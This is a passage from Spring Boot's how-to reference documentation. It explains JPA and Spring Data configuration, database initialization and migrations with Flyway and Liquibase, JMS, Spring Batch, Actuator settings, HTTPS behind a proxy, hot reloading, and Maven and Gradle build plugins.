for the two `EntityManagers` as well. If you mark one of\nthem as `@Primary`, it could be picked up by the default `JpaTransactionManager` in Spring\nBoot. The other would have to be explicitly injected into a new instance. Alternatively,\nyou might be able to use a JTA transaction manager that spans both.\n\nIf you use Spring Data, you need to configure `@EnableJpaRepositories` accordingly,\nas shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a Traditional `persistence.xml` File\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default. If you\nprefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of\ntype `LocalEntityManagerFactoryBean` (with an ID of '`entityManagerFactory`') and set the\npersistence unit name there.\n\nSee\n{sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor the default settings.\n\n\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo Repositories\n\nSpring Data JPA and Spring Data Mongo can both automatically create `Repository`\nimplementations for you. If they are both present on the classpath, you might have to do\nsome extra configuration to tell Spring Boot which repositories to create. The most\nexplicit way to do that is to use the standard Spring Data `+@EnableJpaRepositories+` and\n`+@EnableMongoRepositories+` annotations and provide the location of your `Repository`\ninterfaces.\n\nThere are also flags (`+spring.data.*.repositories.enabled+` and\n`+spring.data.*.repositories.type+`) that you can use to switch the auto-configured\nrepositories on and off in external configuration. Doing so is useful, for instance, in\ncase you want to switch off the Mongo repositories and still use the auto-configured\n`MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data\nrepository types (Elasticsearch, Solr, and others). To work with them, change the names of\nthe annotations and flags accordingly.\n\n\n\n[[howto-use-customize-spring-datas-web-support]]\n=== Customize Spring Data's Web Support\nSpring Data provides web support that simplifies the use of Spring Data repositories in a\nweb application. Spring Boot provides properties in the `spring.data.web` namespace\nfor customizing its configuration. Note that if you are using Spring Data REST, you must\nuse the properties in the `spring.data.rest` namespace instead.\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data Repositories as REST Endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you,\nprovided Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties (from the `spring.data.rest` namespace)\nthat customize the\n{spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a\n{spring-data-rest-javadoc}\/webmvc\/config\/RepositoryRestConfigurer.{dc-ext}[`RepositoryRestConfigurer`]\nbean.\n\nNOTE: If you do not specify any order on your custom `RepositoryRestConfigurer`, it runs\nafter the one Spring Boot uses internally. If you need to specify an order, make sure it\nis higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a Component that is Used by JPA\nIf you want to configure a component that JPA uses, then you need to ensure\nthat the component is initialized before JPA. When the component is auto-configured,\nSpring Boot takes care of this for you. For example, when Flyway is auto-configured,\nHibernate is configured to depend upon Flyway so that Flyway has a chance to\ninitialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an\n`EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up\nthe necessary dependencies. For example, if you use Hibernate Search with\nElasticsearch as its index manager, any `EntityManagerFactory` beans must be\nconfigured to depend on the `elasticsearchClient` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own\n`DSLContext` for each one. Refer to\n{sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration]\nfor more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be\nreused to provide similar features to what the auto-configuration does with a single\n`DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database Initialization\nAn SQL database can be initialized in different ways depending on what your stack is.\nOf course, you can also do it manually, provided the database is a separate process.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a Database Using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the\ndatabase. This is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor\nindependent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the\nbehavior in a more fine-grained way. This feature is described in more detail later in\nthis guide.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a Database Using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly and the standard Hibernate property\nvalues are `none`, `validate`, `update`, `create`, and `create-drop`. Spring Boot chooses\na default value for you based on whether it thinks your database is embedded. It defaults\nto `create-drop` if no schema manager has been detected or `none` in all other cases. An\nembedded database is detected by looking at the `Connection` type. `hsqldb`, `h2`, and\n`derby` are embedded, and others are not. Be careful when switching from in-memory to a\n'`real`' database that you do not make assumptions about the existence of the tables and\ndata in the new platform. You either have to set `ddl-auto` explicitly or use one of the\nother mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger. This\nis done for you automatically if you enable the\n<<boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath is executed on\nstartup if Hibernate creates the schema from scratch (that is, if the `ddl-auto` property\nis set to `create` or `create-drop`). This can be useful for demos and for testing if you\nare careful but is probably not something you want to be on the classpath in production.\nIt is a Hibernate feature (and has nothing to do with Spring).\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a Database\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and\ninitialize it (DML scripts). It loads SQL from the standard root classpath locations:\n`schema.sql` and `data.sql`, respectively. In addition, Spring Boot processes the\n`schema-${platform}.sql` and `data-${platform}.sql` files (if present), where `platform`\nis the value of `spring.datasource.platform`. This allows you to switch to\ndatabase-specific scripts if necessary. For example, you might choose to set it to the\nvendor name of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql`, and so on).\n\n[NOTE]\n====\nSpring Boot automatically creates the schema of an embedded `DataSource`. This behaviour\ncan be customized by using the `spring.datasource.initialization-mode` property. For\ninstance, if you want to always initialize the `DataSource` regardless of its type:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.datasource.initialization-mode=always\n----\n====\n\nBy default, Spring Boot enables the fail-fast feature of the Spring JDBC initializer. This\nmeans that, if the scripts cause exceptions, the application fails to start. You can tune\nthat behavior by setting `spring.datasource.continue-on-error`.\n\nNOTE: In a JPA-based app, you can choose to let Hibernate create the schema or use\n`schema.sql`, but you cannot do both. Make sure to disable\n`spring.jpa.hibernate.ddl-auto` if you use `schema.sql`.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch Database\nIf you use Spring Batch, it comes pre-packaged with SQL initialization scripts for most\npopular database platforms. Spring Boot can detect your database type and execute those\nscripts on startup. If you use an embedded database, this happens by default. You can also\nenable it for any database type, as shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.batch.initialize-schema=always\n----\n\nYou can also switch off the initialization explicitly by setting\n`spring.batch.initialize-schema=never`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a Higher-level Database Migration Tool\nSpring Boot supports two higher-level migration tools: https:\/\/flywaydb.org\/[Flyway]\nand http:\/\/www.liquibase.org\/[Liquibase].\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway Database Migrations on Startup\nTo automatically run Flyway database migrations on startup, add the\n`org.flywaydb:flyway-core` to your classpath.\n\nThe migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an\nunderscore-separated version, such as '`1`' or '`2_1`'). By default, they are in a folder\ncalled `classpath:db\/migration`, but you can modify that location by setting\n`spring.flyway.locations`. This is a comma-separated list of one or more `classpath:`\nor `filesystem:` locations. For example, the following configuration would search for\nscripts in both the default classpath location and the `\/opt\/migration` directory:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration,filesystem:\/opt\/migration\n----\n\nYou can also add a special `{vendor}` placeholder to use vendor-specific scripts. Assume\nthe following:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration\/{vendor}\n----\n\nRather than using `db\/migration`, the preceding configuration sets the folder to use\naccording to the type of the database (such as `db\/migration\/mysql` for MySQL). The list\nof supported databases is available in\n{sc-spring-boot}\/jdbc\/DatabaseDriver.{sc-ext}[`DatabaseDriver`].\n\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[`FlywayProperties`]\nprovides most of Flyway's settings and a small set of additional properties that can be\nused to disable the migrations or switch off the location checking. If you need more\ncontrol over the configuration, consider registering a `FlywayConfigurationCustomizer`\nbean.\n\nSpring Boot calls `Flyway.migrate()` to perform the database migration. If you would like\nmore control, provide a `@Bean` that implements\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayMigrationStrategy.{sc-ext}[`FlywayMigrationStrategy`].\n\nFlyway supports SQL and Java https:\/\/flywaydb.org\/documentation\/callbacks.html[callbacks].\nTo use SQL-based callbacks, place the callback scripts in the `classpath:db\/migration`\nfolder. To use Java-based callbacks, create one or more beans that implement\n`Callback`. Any such beans are automatically registered with `Flyway`. They can be\nordered by using `@Order` or by implementing `Ordered`. Beans that implement the\ndeprecated `FlywayCallback` interface can also be detected, however they cannot be used\nalongside `Callback` beans.\n\nBy default, Flyway autowires the (`@Primary`) `DataSource` in your context and\nuses that for migrations. If you like to use a different `DataSource`, you can create\none and mark its `@Bean` as `@FlywayDataSource`. If you do so and want two data sources,\nremember to create another one and mark it as `@Primary`. Alternatively, you can use\nFlyway's native `DataSource` by setting `spring.flyway.[url,user,password]`\nin external properties. Setting either `spring.flyway.url` or `spring.flyway.user`\nis sufficient to cause Flyway to use its own `DataSource`. If any of the three\nproperties has not be set, the value of its equivalent `spring.datasource` property will\nbe used.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-flyway[Flyway sample] so\nthat you can see how to set things up.\n\nYou can also use Flyway to provide data for specific scenarios. For example, you can\nplace test-specific migrations in `src\/test\/resources` and they are run only when your\napplication starts for testing. Also, you can use profile-specific configuration to\ncustomize `spring.flyway.locations` so that certain migrations run only when a particular\nprofile is active. For example, in `application-dev.properties`, you might specify the\nfollowing setting:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:\/db\/migration,classpath:\/dev\/db\/migration\n----\n\nWith that setup, migrations in `dev\/db\/migration` run only when the `dev` profile is\nactive.\n\n\n\n[[howto-execute-liquibase-database-migrations-on-startup]]\n==== Execute Liquibase Database Migrations on Startup\nTo automatically run Liquibase database migrations on startup, add the\n`org.liquibase:liquibase-core` to your classpath.\n\nBy default, the master change log is read from `db\/changelog\/db.changelog-master.yaml`,\nbut you can change the location by setting `spring.liquibase.change-log`. In addition to\nYAML, Liquibase also supports JSON, XML, and SQL change log formats.\n\nBy default, Liquibase autowires the (`@Primary`) `DataSource` in your context and uses\nthat for migrations. If you need to use a different `DataSource`, you can create one and\nmark its `@Bean` as `@LiquibaseDataSource`. If you do so and you want two data sources,\nremember to create another one and mark it as `@Primary`. Alternatively, you can use\nLiquibase's native `DataSource` by setting `spring.liquibase.[url,user,password]` in\nexternal properties. Setting either `spring.liquibase.url` or `spring.liquibase.user`\nis sufficient to cause Liquibase to use its own `DataSource`. If any of the three\nproperties has not be set, the value of its equivalent `spring.datasource` property will\nbe used.\n\nSee\n{sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[`LiquibaseProperties`]\nfor details about available settings such as contexts, the default schema, and others.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-liquibase[Liquibase\nsample] so that you can see how to set things up.\n\n\n\n[[howto-messaging]]\n== Messaging\n\nSpring Boot offers a number of starters that include messaging. This section answers\nquestions that arise from using messaging with Spring Boot.\n\n[[howto-jms-disable-transaction]]\n=== Disable Transacted JMS Session\nIf your JMS broker does not support transacted sessions, you have to disable the\nsupport of transactions altogether. If you create your own `JmsListenerContainerFactory`,\nthere is nothing to do, since, by default it cannot be transacted. If you want to use\nthe `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you\ncan disable transacted sessions, as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThe preceding example overrides the default factory, and it should be applied to any\nother factory that your application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch Applications\n\nThis section answers questions that arise from using Spring Batch with Spring Boot.\n\nNOTE: By default, batch applications require a `DataSource` to store job details. If you\nwant to deviate from that, you need to implement `BatchConfigurer`. See\n{spring-batch-javadoc}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The\nJavadoc of `@EnableBatchProcessing`] for more details.\n\nFor more about Spring Batch, see the https:\/\/projects.spring.io\/spring-batch\/[Spring Batch\nproject page].\n\n\n\n[[howto-execute-spring-batch-jobs-on-startup]]\n=== Execute Spring Batch Jobs on Startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing`\n(from Spring Batch) somewhere in your context.\n\nBy default, it executes *all* `Jobs` in the application context on startup (see\n{sc-spring-boot-autoconfigure}\/batch\/JobLauncherCommandLineRunner.{sc-ext}[JobLauncherCommandLineRunner]\nfor details). You can narrow down to a specific job or jobs by specifying\n`spring.batch.job.names` (which takes a comma-separated list of job name patterns).\n\n[TIP]\n.Specifying job parameters on the command line\n====\nUnlike command line option arguments that\n<<spring-boot-features.adoc#boot-features-external-config-command-line-args,set properties\nin the `Environment`>> (i.e. by starting with `--`, such as\n`--my-property=value`), job parameters have to be specified on the command line without\ndashes (e.g. `jobParam=value`).\n====\n\nIf the application context includes a `JobRegistry`, the jobs in\n`spring.batch.job.names` are looked up in the registry instead of being autowired from the\ncontext. This is a common pattern with more complex systems, where multiple jobs are\ndefined in child contexts and registered centrally.\n\nSee\n{sc-spring-boot-autoconfigure}\/batch\/BatchAutoConfiguration.{sc-ext}[BatchAutoConfiguration]\nand\nhttps:\/\/github.com\/spring-projects\/spring-batch\/blob\/master\/spring-batch-core\/src\/main\/java\/org\/springframework\/batch\/core\/configuration\/annotation\/EnableBatchProcessing.java[@EnableBatchProcessing]\nfor more details.\n\n\n\n[[howto-actuator]]\n== Actuator\n\nSpring Boot includes the Spring Boot Actuator. This section answers questions that often\narise from its use.\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP Port or Address of the Actuator Endpoints\nIn a standalone application, the Actuator HTTP port defaults to the same as the main HTTP\nport. To make the application listen on a different port, set the external property:\n`management.server.port`. To listen on a completely different network address (such as\nwhen you have an internal network for management and an external one for user\napplications), you can also set `management.server.address` to a valid IP address to which\nthe server is able to bind.\n\nFor more detail, see the\n{sc-spring-boot-actuator-autoconfigure}\/web\/server\/ManagementServerProperties.{sc-ext}[`ManagementServerProperties`]\nsource code and\n\"`<<production-ready-features.adoc#production-ready-customizing-management-server-port>>`\"\nin the \"`Production-ready features`\" section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' Error Page\nSpring Boot installs a '`whitelabel`' error page that you see in a browser client if\nyou encounter a server error (machine clients consuming JSON and other media types should\nsee a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off.\nDoing so restores the default of the servlet container that you are using. Note that\nSpring Boot still tries to resolve the error view, so you should probably add your own\nerror page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you\nuse. For example, if you use Thymeleaf, you can add an `error.html` template.\nIf you use FreeMarker, you can add an `error.ftl` template. In general, you\nneed a `View` that resolves with a name of `error` or a `@Controller` that handles\nthe `\/error` path. Unless you replaced some of the default configuration, you should find\na `BeanNameViewResolver` in your `ApplicationContext`, so a `@Bean` named `error` would\nbe a simple way of doing that. See\n{sc-spring-boot-autoconfigure}\/web\/servlet\/error\/ErrorMvcAutoConfiguration.{sc-ext}[`ErrorMvcAutoConfiguration`]\nfor more options.\n\nSee also the section on \"`<<boot-features-error-handling, Error Handling>>`\" for details\nof how to register handlers in the servlet container.\n\n\n\n[[howto-sanitize-sensible-values]]\n=== Sanitize sensible values\nInformation returned by the `env` and `configprops` endpoints can be somewhat sensitive\nso keys matching a certain pattern are sanitized by default (i.e. their values are\nreplaced by `+******+`).\n\nSpring Boot uses sensible defaults for such keys: for instance, any key ending with the\nword \"password\", \"secret\", \"key\" or \"token\" is sanitized. It is also possible to use a\nregular expression instead, such as `+*credentials.*+` to sanitize any key that holds the\nword `credentials` as part of the key.\n\nThe patterns to use can be customized using the `management.endpoint.env.keys-to-sanitize`\nand `management.endpoint.configprops.keys-to-sanitize` respectively.\n\n\n\n[[howto-security]]\n== Security\n\nThis section addresses questions about security when working with Spring Boot, including\nquestions that arise from using Spring Security with Spring Boot.\n\nFor more about Spring Security, see the {spring-security}[Spring Security project page].\n\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot Security Configuration\nIf you define a `@Configuration` with a `WebSecurityConfigurerAdapter` in your application,\nit switches off the default webapp security settings in Spring Boot.\n\n\n[[howto-change-the-user-details-service-and-add-user-accounts]]\n=== Change the UserDetailsService and Add User Accounts\nIf you provide a `@Bean` of type `AuthenticationManager`, `AuthenticationProvider`,\nor `UserDetailsService`, the default `@Bean` for `InMemoryUserDetailsManager` is not\ncreated, so you have the full feature set of Spring Security available (such as\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#jc-authentication[various\nauthentication options]).\n\nThe easiest way to add user accounts is to provide your own `UserDetailsService` bean.\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS When Running behind a Proxy Server\nEnsuring that all your main endpoints are only available over HTTPS is an important\nchore for any application. If you use Tomcat as a servlet container, then\nSpring Boot adds Tomcat's own `RemoteIpValve` automatically if it detects some\nenvironment settings, and you should be able to rely on the `HttpServletRequest` to\nreport whether it is secure or not (even downstream of a proxy server that handles the\nreal SSL termination). The standard behavior is determined by the presence or absence of\ncertain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are\nconventional, so it should work with most front-end proxies. You can switch on the valve\nby adding some entries to `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties switches on the valve. Alternatively, you can\nadd the `RemoteIpValve` by adding a `TomcatServletWebServerFactory` bean.)\n\nTo configure Spring Security to require a secure channel for all (or some)\nrequests, consider adding your own `WebSecurityConfigurerAdapter` that adds the following\n`HttpSecurity` configuration:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class SslWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\t\/\/ Customize the application security\n\t\t\thttp.requiresChannel().anyRequest().requiresSecure();\n\t\t}\n\n\t}\n----\n\n\n[[howto-hotswapping]]\n== Hot Swapping\n\nSpring Boot supports hot swapping. This section answers questions about how it works.\n\n\n\n[[howto-reload-static-content]]\n=== Reload Static Content\nThere are several options for hot reloading. The recommended approach is to use\n<<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>>, as it provides\nadditional development-time features, such as support for fast application restarts\nand LiveReload as well as sensible development-time configuration (such as template\ncaching). Devtools works by monitoring the classpath for changes. This means that static\nresource changes must be \"built\" for the change to take affect. By default, this happens\nautomatically in Eclipse when you save your changes. In IntelliJ IDEA, the Make Project\ncommand triggers the necessary build. Due to the\n<<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart\nexclusions>>, changes to static resources do not trigger a restart of your application.\nThey do, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do\ndevelopment (all modern IDEs allow reloading of static resources and usually also allow\nhot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can\nbe configured (see the `addResources` property) to support running from the command line\nwith reloading of static files directly from source. You can use that with an external\ncss\/js compiler process if you are writing that code with higher-level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload Templates without Restarting the Container\nMost of the templating technologies supported by Spring Boot include a configuration\noption to disable caching (described later in this document). If you use the\n`spring-boot-devtools` module, these properties are\n<<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>>\nfor you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf Templates\nIf you use Thymeleaf, set `spring.thymeleaf.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\nfor other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker Templates\nIf you use FreeMarker, set `spring.freemarker.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\nfor other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy Templates\nIf you use Groovy templates, set `spring.groovy.template.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\nfor other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast Application Restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhile not as fast as technologies such as\nhttp:\/\/zeroturnaround.com\/software\/jrebel\/[JRebel] it is usually significantly faster than\na \"`cold start`\". You should probably give it a try before investigating some of the more\ncomplex reload options discussed later in this document.\n\nFor more details, see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java Classes without Restarting the Container\nMany modern IDEs (Eclipse, IDEA, and others) support hot swapping of bytecode.\nConsequently, if you make a change that does not affect class or method signatures, it\nshould reload cleanly with no side effects.\n\n\n\n[[howto-build]]\n== Build\n\nSpring Boot includes build plugins for Maven and Gradle. This section answers common\nquestions about these plugins.\n\n\n\n[[howto-build-info]]\n=== Generate Build Information\nBoth the Maven plugin and the Gradle plugin allow generating build information containing\nthe coordinates, name, and version of the project. The plugins can also be configured\nto add additional properties through configuration. When such a file is present,\nSpring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: See the {spring-boot-maven-plugin-site}[Spring Boot Maven Plugin documentation]\nfor more details.\n\nThe following example does the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nTIP: See the\n{spring-boot-gradle-plugin-reference}\/#integrating-with-actuator-build-info[Spring Boot\nGradle Plugin documentation] for more details.\n\n\n\n[[howto-git-info]]\n=== Generate Git Information\n\nBoth Maven and Gradle allow generating a `git.properties` file containing information\nabout the state of your `git` source code repository when the project was built.\n\nFor Maven users, the `spring-boot-starter-parent` POM includes a pre-configured plugin to\ngenerate a `git.properties` file. To use it, add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result by using the\nhttps:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`]\nplugin, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"1.5.1\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the following format:\n`yyyy-MM-dd'T'HH:mm:ssZ`. This is the default format for both plugins listed above. Using\nthis format lets the time be parsed into a `Date` and its format, when serialized to JSON,\nto be controlled by Jackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions]]\n=== Customize Dependency Versions\nIf you use a Maven build that inherits directly or indirectly from\n`spring-boot-dependencies` (for instance, `spring-boot-starter-parent`) but you want to\noverride a specific third-party dependency, you can add appropriate `<properties>`\nelements. Browse the\n{github-code}\/spring-boot-project\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies`]\nPOM for a complete list of properties. For example, to pick a different `slf4j` version,\nyou would add the following property:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<slf4j.version>1.7.5<slf4j.version>\n\t<\/properties>\n----\n\nNOTE: Doing so only works if your Maven project inherits (directly or indirectly) from\n`spring-boot-dependencies`. If you have added `spring-boot-dependencies` in your\nown `dependencyManagement` section with `<scope>import<\/scope>`, you have to redefine\nthe artifact yourself instead of overriding the property.\n\nWARNING: Each Spring Boot release is designed and tested against this specific set of\nthird-party dependencies. Overriding versions may cause compatibility issues.\n\nTo override dependency versions in Gradle, see {spring-boot-gradle-plugin-reference}\/#managing-dependencies-customizing[this section]\nof the Gradle plugin's documentation.\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an Executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable \"`fat`\" JAR. If you\nuse the `spring-boot-starter-parent` POM, you can declare the plugin and your jars are\nrepackaged as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you do not use the parent POM, you can still use the plugin. However, you must\nadditionally add an `<executions>` section, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-site}\/usage.html[plugin documentation] for full usage\ndetails.\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot Application as a Dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency. If\nyour application contains classes that you want to share with other projects, the\nrecommended approach is to move that code into a separate module. The separate module can\nthen be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle\nplugins must be configured to produce a separate artifact that is suitable for use as a\ndependency. The executable archive cannot be used as a dependency as the\n<<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar\nformat>> packages application classes in `BOOT-INF\/classes`. This means\nthat they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is\nexecutable, a classifier must be specified. This classifier is applied to the name of the\nexecutable archive, leaving the default archive for use as a dependency.\n\nTo configure a classifier of `exec` in Maven, you can use the following 